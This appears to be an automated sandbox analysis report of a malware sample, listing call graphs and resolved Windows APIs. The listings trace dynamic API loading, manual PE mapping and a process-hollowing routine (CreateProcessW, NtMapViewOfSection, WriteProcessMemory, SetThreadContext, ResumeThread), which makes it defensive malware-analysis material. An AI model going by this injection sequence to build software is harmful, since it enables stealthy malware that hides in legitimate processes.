54775->54781 54776 44ade1 54779 448c33 _strftime 11 API calls 54776->54779 54776->54783 54777->54781 54778 44aeaf 54796 435ecd 20 API calls _free 54778->54796 54779->54783 54781->54778 54782 448c33 _strftime 11 API calls 54781->54782 54784 44ae8e 54782->54784 54797 435ecd 20 API calls _free 54783->54797 54784->54778 54785 44ae9d WideCharToMultiByte 54784->54785 54785->54778 54786 44aedd 54785->54786 54798 435ecd 20 API calls _free 54786->54798 54789 44854a FindHandlerForForeignException 5 API calls 54788->54789 54790 448c5a 54789->54790 54793 448c63 54790->54793 54799 448cbb 10 API calls 3 library calls 54790->54799 54792 448ca3 LCMapStringW 54792->54793 54794 43502b __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 54793->54794 54795 448cb5 54794->54795 54795->54775 54795->54776 54795->54783 54796->54783 54797->54765 54798->54783 54799->54792 54801 41cc20 LoadLibraryA GetProcAddress 54800->54801 54802 41cc10 GetModuleHandleA GetProcAddress 54800->54802 54803 41cc49 44 API calls 54801->54803 54804 41cc39 LoadLibraryA GetProcAddress 54801->54804 54802->54801 54803->54324 54804->54803 55118 41b539 FindResourceA 54805->55118 54808 43bda0 ___std_exception_copy 21 API calls 54809 40f428 ctype 54808->54809 54810 4020b7 28 API calls 54809->54810 54811 40f443 54810->54811 54812 401fe2 28 API calls 54811->54812 54813 40f44e 54812->54813 54814 401fd8 11 API calls 54813->54814 54815 40f457 54814->54815 54816 43bda0 ___std_exception_copy 21 API calls 54815->54816 54817 40f468 ctype 54816->54817 55121 406e13 54817->55121 54819 40f49b 54819->54326 54821 40fb5e 54820->54821 54823 40fb65 54820->54823 55124 402163 11 API calls 54821->55124 54823->54334 55125 401fab 54824->55125 55014->54341 55015->54350 55016->54354 55019 4020df 11 API calls 55018->55019 55020 406c65 55019->55020 55021 4032a0 28 API calls 55020->55021 55022 406c82 55021->55022 55022->54375 55024 40ebdf 55023->55024 55025 4135ae RegQueryValueExA RegCloseKey 55023->55025 55024->54372 55024->54389 55025->55024 55026->54380 55116->54399 55119 41b556 LoadResource LockResource SizeofResource 55118->55119 55120 40f419 55118->55120 55119->55120 55120->54808 55122 4020b7 28 API calls 55121->55122 55123 406e27 55122->55123 55123->54819 55124->54823 55629 4129da 55630 4129ec 55629->55630 55631 4041a2 28 API calls 55630->55631 55632 4129ff 55631->55632 55633 4020f6 28 API calls 55632->55633 55634 412a0e 55633->55634 55635 4020f6 28 API calls 55634->55635 55636 412a1d 55635->55636 55637 41beac 28 API calls 55636->55637 55638 412a26 55637->55638 55639 412ace 55638->55639 55641 401e65 22 API calls 55638->55641 55640 401e8d 11 API calls 55639->55640 55642 412ad7 55640->55642 55643 412a3d 55641->55643 55644 401fd8 11 API calls 55642->55644 55645 4020f6 28 API calls 55643->55645 55646 412ae0 55644->55646 55647 412a48 55645->55647 55648 401fd8 11 API calls 55646->55648 55649 401e65 22 API calls 55647->55649 55650 412ae8 55648->55650 55651 412a53 55649->55651 55652 4020f6 28 API calls 55651->55652 55653 412a5e 55652->55653 55654 401e65 22 API calls 55653->55654 55655 412a69 55654->55655 55656 4020f6 28 API calls 55655->55656 55657 412a74 55656->55657 55658 401e65 22 API calls 55657->55658 55659 412a7f 55658->55659 55660 4020f6 28 API calls 55659->55660 55661 412a8a 55660->55661 55662 401e65 22 API calls 55661->55662 55663 412a95 55662->55663 55664 4020f6 28 API calls 55663->55664 55665 412aa0 55664->55665 55666 401e65 22 API calls 55665->55666 55667 412aae 55666->55667 55668 4020f6 28 API calls 55667->55668 55669 412ab9 55668->55669 55673 412aef GetModuleFileNameW 55669->55673 55672 404e26 99 API calls 55672->55639 55674 4020df 11 API calls 55673->55674 55675 412b1a 55674->55675 55676 4020df 11 API calls 55675->55676 55677 412b26 55676->55677 55678 4020df 11 API calls 55677->55678 55701 412b32 55678->55701 55679 41ba09 43 API calls 55679->55701 55680 40da23 32 API calls 55680->55701 55681 401fd8 11 API calls 55681->55701 55682 403014 28 API calls 55682->55701 55683 4185a3 31 API calls 55683->55701 55684 412c58 Sleep 55684->55701 55685 40417e 28 API calls 55685->55701 55686 4042fc 84 API calls 55686->55701 55687 401f09 11 API calls 55687->55701 55688 412cfa Sleep 55688->55701 55689 40431d 28 API calls 55689->55701 55690 412d9c Sleep 55690->55701 55691 41c516 32 API calls 55691->55701 55692 412dff DeleteFileW 55692->55701 55693 412e36 DeleteFileW 55693->55701 55694 412e61 55696 412e72 DeleteFileW 55694->55696 55694->55701 55709 401f09 11 API calls 55694->55709 55712 412eff 55694->55712 55695 412e88 Sleep 55695->55701 55696->55701 55697 412f01 55698 401f09 11 API calls 55697->55698 55699 412f0d 55698->55699 55700 401f09 11 API calls 55699->55700 55702 412f19 55700->55702 55701->55679 55701->55680 55701->55681 55701->55682 55701->55683 55701->55684 55701->55685 55701->55686 55701->55687 55701->55688 55701->55689 55701->55690 55701->55691 55701->55692 55701->55693 55701->55694 55701->55695 55701->55697 55705 412ecd Sleep 55701->55705 55703 401f09 11 API calls 55702->55703 55704 412f25 55703->55704 55706 40b93f 28 API calls 55704->55706 55707 401f09 11 API calls 55705->55707 55708 412f38 55706->55708 55707->55694 55710 4020f6 28 API calls 55708->55710 55709->55694 55711 412f58 55710->55711 55820 413268 55711->55820 55712->55704 55715 401f09 11 API calls 55716 412f6f 55715->55716 55717 4130e3 55716->55717 55718 412f8f 55716->55718 55719 41bdaf 28 API calls 55717->55719 55720 41bdaf 28 API calls 55718->55720 55721 4130ec 55719->55721 55722 412f9b 55720->55722 55723 402f31 28 API calls 55721->55723 55724 41bc1f 28 API calls 55722->55724 55725 413123 55723->55725 55726 412fb5 55724->55726 55727 402f10 28 API calls 55725->55727 55728 402f31 28 API calls 55726->55728 55729 413132 55727->55729 55730 412fe5 55728->55730 55731 402f10 28 API calls 55729->55731 55732 402f10 28 API calls 55730->55732 55733 41313e 55731->55733 55734 412ff4 55732->55734 55735 402f10 28 API calls 55733->55735 55736 402f10 28 API calls 55734->55736 55737 41314d 55735->55737 55738 413003 55736->55738 55740 402f10 28 API calls 55737->55740 55739 402f10 28 API calls 55738->55739 55742 413012 55739->55742 55741 41315c 55740->55741 55743 402f10 28 API calls 55741->55743 55744 402f10 28 API calls 55742->55744 55745 41316b 55743->55745 55746 413021 55744->55746 55747 402f10 28 API calls 55745->55747 55748 402f10 28 API calls 55746->55748 55749 41317a 55747->55749 55750 41302d 55748->55750 55834 402ea1 28 API calls 55749->55834 55752 402f10 28 API calls 55750->55752 55754 413039 55752->55754 55753 413184 55755 404aa1 61 API calls 55753->55755 55832 402ea1 28 API calls 55754->55832 55757 413191 55755->55757 55759 401fd8 11 API calls 55757->55759 55758 413048 55760 402f10 28 API calls 55758->55760 55761 41319d 55759->55761 55762 413054 55760->55762 55763 401fd8 11 API calls 55761->55763 55833 402ea1 28 API calls 55762->55833 55765 4131a9 55763->55765 55767 401fd8 11 API calls 55765->55767 55766 41305e 55768 404aa1 61 API calls 55766->55768 55769 4131b5 55767->55769 55770 41306b 55768->55770 55772 401fd8 11 API calls 55769->55772 55771 401fd8 11 API calls 55770->55771 55774 413074 55771->55774 55773 4131c1 55772->55773 55775 401fd8 11 API calls 55773->55775 55776 401fd8 11 API calls 55774->55776 55777 4131ca 55775->55777 55778 41307d 55776->55778 55779 401fd8 11 API calls 55777->55779 55780 401fd8 11 API calls 55778->55780 55781 4131d3 55779->55781 55782 413086 55780->55782 55783 401fd8 11 API calls 55781->55783 55784 401fd8 11 API calls 55782->55784 55785 4130d7 55783->55785 55786 41308f 55784->55786 55788 401fd8 11 API calls 55785->55788 55787 401fd8 11 API calls 55786->55787 55789 41309b 55787->55789 55790 4131e5 55788->55790 55791 401fd8 11 API calls 55789->55791 55792 401f09 11 API calls 55790->55792 55793 4130a7 55791->55793 55794 4131f1 55792->55794 55795 401fd8 11 API calls 55793->55795 55796 401fd8 11 API calls 55794->55796 55797 4130b3 55795->55797 55798 4131fd 55796->55798 55799 401fd8 11 API calls 55797->55799 55800 401fd8 11 API calls 55798->55800 55801 4130bf 55799->55801 55803 413209 55800->55803 55802 401fd8 11 API calls 55801->55802 55805 4130cb 55802->55805 55804 401fd8 11 API calls 55803->55804 55806 413215 55804->55806 55807 401fd8 11 API calls 55805->55807 55808 401fd8 11 API calls 55806->55808 55807->55785 55809 413221 55808->55809 55810 401fd8 11 API calls 55809->55810 55811 41322d 55810->55811 55812 401fd8 11 API calls 55811->55812 55813 413239 55812->55813 55814 401fd8 11 API calls 55813->55814 55815 413245 55814->55815 55816 401fd8 11 API calls 55815->55816 55817 413251 55816->55817 55818 401fd8 11 API calls 55817->55818 55819 412abe 55818->55819 55819->55672 55821 4132a6 55820->55821 55823 413277 55820->55823 55822 4132b5 55821->55822 55835 10001c5b 55821->55835 55824 40417e 28 API calls 55822->55824 55839 411d2d 55823->55839 55826 4132c1 55824->55826 55828 401fd8 11 API calls 55826->55828 55829 412f63 55828->55829 55829->55715 55832->55758 55833->55766 55834->55753 55836 10001c6b ___scrt_fastfail 55835->55836 55843 100012ee 55836->55843 55838 10001c87 55838->55822 55885 411d39 55839->55885 55842 411fa2 22 API calls ___std_exception_copy 55842->55821 55844 10001324 ___scrt_fastfail 55843->55844 55845 100013b7 GetEnvironmentVariableW 55844->55845 55869 100010f1 55845->55869 55848 100010f1 51 API calls 55849 10001465 55848->55849 55850 100010f1 51 API calls 55849->55850 55851 10001479 55850->55851 55852 100010f1 51 API calls 55851->55852 55853 1000148d 55852->55853 55854 100010f1 51 API calls 55853->55854 55855 100014a1 55854->55855 55856 100010f1 51 API calls 55855->55856 55857 100014b5 lstrlenW 55856->55857 55858 100014d2 55857->55858 55859 100014d9 lstrlenW 55857->55859 55858->55838 55860 100010f1 51 API calls 55859->55860 55861 10001501 lstrlenW lstrcatW 55860->55861 55862 100010f1 51 API calls 55861->55862 55863 10001539 lstrlenW lstrcatW 55862->55863 55864 100010f1 51 API calls 55863->55864 55865 1000156b lstrlenW lstrcatW 55864->55865 55866 100010f1 51 API calls 55865->55866 55867 1000159d lstrlenW lstrcatW 55866->55867 55868 100010f1 51 API calls 55867->55868 55868->55858 55870 10001118 ___scrt_fastfail 55869->55870 55871 10001129 lstrlenW 55870->55871 55882 10002c40 55871->55882 55874 10001177 lstrlenW FindFirstFileW 55876 100011a0 55874->55876 55877 100011e1 55874->55877 55875 10001168 lstrlenW 55875->55874 55878 100011c7 FindNextFileW 55876->55878 55879 100011aa 55876->55879 55877->55848 55878->55876 55881 100011da FindClose 55878->55881 55879->55878 55884 10001000 51 API calls ___scrt_fastfail 55879->55884 55881->55877 55883 10001148 lstrcatW lstrlenW 55882->55883 55883->55874 55883->55875 55884->55879 55920 4117d7 55885->55920 55887 411d57 55888 411d6d SetLastError 55887->55888 55889 4117d7 SetLastError 55887->55889 55916 411d35 55887->55916 55888->55916 55890 411d8a 55889->55890 55890->55888 55892 411dac GetNativeSystemInfo 55890->55892 55890->55916 55893 411df2 55892->55893 55904 411dff SetLastError 55893->55904 55923 411cde VirtualAlloc 55893->55923 55896 411e22 55897 411e47 GetProcessHeap HeapAlloc 55896->55897 55949 411cde VirtualAlloc 55896->55949 55898 411e70 55897->55898 55899 411e5e 55897->55899 55902 4117d7 SetLastError 55898->55902 55950 411cf5 VirtualFree 55899->55950 55905 411eb9 55902->55905 55903 411e3a 55903->55897 55903->55904 55904->55916 55906 411f6b 55905->55906 55924 411cde VirtualAlloc 55905->55924 55951 4120b2 GetProcessHeap HeapFree 55906->55951 55909 411ed2 ctype 55925 4117ea 55909->55925 55911 411efe 55911->55906 55929 411b9a 55911->55929 55915 411f36 55915->55906 55915->55916 55945 1000220c 55915->55945 55916->55842 55917 411f5c 55917->55916 55918 411f60 SetLastError 55917->55918 55918->55906 55921 4117e6 55920->55921 55922 4117db SetLastError 55920->55922 55921->55887 55922->55887 55923->55896 55924->55909 55926 4118c0 55925->55926 55928 411816 ctype ___scrt_fastfail 55925->55928 55926->55911 55927 4117d7 SetLastError 55927->55928 55928->55926 55928->55927 55930 411ca5 55929->55930 55931 411bbb IsBadReadPtr 55929->55931 55930->55906 55939 41198a 55930->55939 55931->55930 55937 411bd5 55931->55937 55934 411cbd SetLastError 55934->55930 55935 411ca7 SetLastError 55935->55930 55936 411c8a IsBadReadPtr 55936->55930 55936->55937 55937->55930 55937->55934 55937->55935 55937->55936 55952 440f5d 55937->55952 55943 4119b0 55939->55943 55940 411a99 55941 4118ed VirtualProtect 55940->55941 55942 411aab 55941->55942 55942->55915 55943->55940 55943->55942 55967 4118ed 55943->55967 55946 10002215 55945->55946 55947 1000221a dllmain_dispatch 55945->55947 55971 100022b1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 55946->55971 55947->55917 55949->55903 55950->55904 55951->55916 55953 446206 55952->55953 55954 446213 55953->55954 55955 44621e 55953->55955 55956 4461b8 ___crtLCMapStringA 21 API calls 55954->55956 55957 446226 55955->55957 55964 44622f ___crtLCMapStringA 55955->55964 55962 44621b 55956->55962 55958 446802 _free 20 API calls 55957->55958 55958->55962 55959 446234 55965 44062d 20 API calls __dosmaperr 55959->55965 55960 446259 RtlReAllocateHeap 55960->55962 55960->55964 55962->55937 55964->55959 55964->55960 55966 443001 7 API calls 2 library calls 55964->55966 55965->55962 55966->55964 55968 4118fe 55967->55968 55970 4118f6 55967->55970 55969 411971 VirtualProtect 55968->55969 55968->55970 55969->55970 55970->55943 55971->55947 55972 42f97e 55973 42f989 55972->55973 55974 42f99d 55973->55974 55976 432f7f 55973->55976 55977 432f8a 55976->55977 55978 432f8e 55976->55978 55977->55974 55979 440f5d 22 API calls 55978->55979 55979->55977 55980 40165e 55981 401666 55980->55981 55982 401669 55980->55982 55983 4016a8 55982->55983 55985 401696 55982->55985 55984 43455e new 22 API calls 55983->55984 55986 40169c 55984->55986 55987 43455e new 22 API calls 55985->55987 55987->55986 55988 426cdc 55993 426d59 send 55988->55993 55994 10001f3f 55995 10001f4b ___scrt_is_nonwritable_in_current_image 55994->55995 56012 1000247c 55995->56012 55997 10001f52 55998 10002041 55997->55998 55999 10001f7c 55997->55999 56006 10001f57 ___scrt_is_nonwritable_in_current_image 55997->56006 56028 10002639 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 55998->56028 56023 100023de IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 55999->56023 56002 10002048 56003 10001f8b __RTC_Initialize 56003->56006 56024 100022fc RtlInitializeSListHead 56003->56024 56005 10001f99 ___scrt_initialize_default_local_stdio_options 56025 100046c5 5 API calls _ValidateLocalCookies 56005->56025 56008 10001fad 56008->56006 56026 100023b3 IsProcessorFeaturePresent ___isa_available_init ___scrt_release_startup_lock 56008->56026 56010 10001fb8 56010->56006 56027 10004669 5 API calls _ValidateLocalCookies 56010->56027 56013 10002485 56012->56013 56029 10002933 IsProcessorFeaturePresent 56013->56029 56015 10002491 56030 100034ea 56015->56030 56017 10002496 56022 1000249a 56017->56022 56039 100053c8 56017->56039 56020 100024b1 56020->55997 56022->55997 56023->56003 56024->56005 56025->56008 56026->56010 56027->56006 56028->56002 56029->56015 56031 100034ef ___vcrt_initialize_winapi_thunks 56030->56031 56043 10003936 6 API calls 2 library calls 56031->56043 56033 100034f9 56034 100034fd 56033->56034 56044 100038e8 56033->56044 56034->56017 56036 10003505 56037 10003510 56036->56037 56052 10003972 RtlDeleteCriticalSection 56036->56052 56037->56017 56071 10007457 56039->56071 56042 10003529 7 API calls 3 library calls 56042->56022 56043->56033 56053 10003af1 56044->56053 56048 1000390b 56049 10003918 56048->56049 56059 1000391b 5 API calls ___vcrt_FlsFree 56048->56059 56049->56036 56051 100038fd 56051->56036 56052->56034 56060 10003a82 56053->56060 56055 10003b0b 56056 10003b24 TlsAlloc 56055->56056 56057 100038f2 56055->56057 56057->56051 56058 10003ba2 5 API calls try_get_function 56057->56058 56058->56048 56059->56051 56061 10003aaa 56060->56061 56063 10003aa6 __crt_fast_encode_pointer 56060->56063 56061->56063 56064 100039be 56061->56064 56063->56055 56065 100039cd try_get_first_available_module 56064->56065 56066 100039ea LoadLibraryExW 56065->56066 56068 10003a60 FreeLibrary 56065->56068 56069 10003a77 56065->56069 56070 10003a38 LoadLibraryExW 56065->56070 56066->56065 56067 10003a05 GetLastError 56066->56067 56067->56065 56068->56065 56069->56063 56070->56065 56074 10007470 56071->56074 56072 10002ada _ValidateLocalCookies 5 API calls 56073 100024a3 56072->56073 56073->56020 56073->56042 56074->56072 56075 10005bff 56083 10005d5c 56075->56083 56078 10005c13 56080 10005c1b 56081 10005c28 56080->56081 56091 10005c2b 10 API calls 56080->56091 56084 10005c45 _abort 4 API calls 56083->56084 56085 10005d83 56084->56085 56086 10005d9b TlsAlloc 56085->56086 56087 10005d8c 56085->56087 56086->56087 56088 10002ada _ValidateLocalCookies 5 API calls 56087->56088 56089 10005c09 56088->56089 56089->56078 56090 10005b7a 19 API calls 2 library calls 56089->56090 56090->56080 56091->56078

                                                                Control-flow Graph

                                                                APIs
                                                                • LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                                                • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                                                • LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                                                • LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                                                • LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                                                • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                                                • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                                                • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                                                • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD17
                                                                • LoadLibraryA.KERNEL32(kernel32), ref: 0041CD28
                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD2B
                                                                • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD3B
                                                                • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD4B
                                                                • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD5D
                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD60
                                                                • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD6D
                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD70
                                                                • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD84
                                                                • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD98
                                                                • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDAA
                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDAD
                                                                • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDBA
                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDBD
                                                                • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDCA
                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDCD
                                                                • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDDA
                                                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDDD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressProc$LibraryLoad$HandleModule
                                                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                • API String ID: 4236061018-3687161714
                                                                • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                                                • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 448 41812a-418153 449 418157-4181be GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 448->449 450 4181c4-4181cb 449->450 451 4184bb 449->451 450->451 453 4181d1-4181d8 450->453 452 4184bd-4184c7 451->452 453->451 454 4181de-4181e0 453->454 454->451 455 4181e6-418213 call 436f10 * 2 454->455 455->451 460 418219-418224 455->460 460->451 461 41822a-41825a CreateProcessW 460->461 462 418260-418288 VirtualAlloc GetThreadContext 461->462 463 4184b5 GetLastError 461->463 464 41847f-4184b3 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 462->464 465 41828e-4182ae ReadProcessMemory 462->465 463->451 464->451 465->464 466 4182b4-4182d6 NtCreateSection 465->466 466->464 467 4182dc-4182e9 466->467 468 4182eb-4182f6 NtUnmapViewOfSection 467->468 469 4182fc-41831e NtMapViewOfSection 467->469 468->469 470 418320-41835d VirtualFree NtClose TerminateProcess 469->470 471 418368-41838f GetCurrentProcess NtMapViewOfSection 469->471 470->449 472 418363 470->472 471->464 473 418395-418399 471->473 472->451 474 4183a2-4183c0 call 436990 473->474 475 41839b-41839f 473->475 478 418402-41840b 474->478 479 4183c2-4183d0 474->479 475->474 480 41842b-41842f 478->480 481 41840d-418413 478->481 482 4183d2-4183f5 call 436990 479->482 484 418431-41844e WriteProcessMemory 480->484 485 418454-41846b SetThreadContext 480->485 481->480 483 418415-418428 call 41853e 481->483 491 4183f7-4183fe 482->491 483->480 484->464 489 418450 484->489 485->464 490 41846d-418479 ResumeThread 485->490 489->485 490->464 493 41847b-41847d 490->493 491->478 493->452
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                                • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
                                                                • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004182CE
                                                                • NtUnmapViewOfSection.NTDLL(?,?), ref: 004182F6
                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418316
                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                                                • NtClose.NTDLL(?), ref: 00418332
                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                                • NtMapViewOfSection.NTDLL(?,00000000), ref: 00418387
                                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
                                                                • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                                • ResumeThread.KERNEL32(?), ref: 00418470
                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                                • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                                • NtUnmapViewOfSection.NTDLL(00000000), ref: 00418499
                                                                • NtClose.NTDLL(?), ref: 004184A3
                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                                • GetLastError.KERNEL32 ref: 004184B5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000E.00000002.997362053.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000E.00000002.997362053.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmap$AllocErrorLastReadResumeWrite
                                                                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                • API String ID: 316982871-3035715614
                                                                • Opcode ID: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                                • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                                                • Opcode Fuzzy Hash: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                                • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
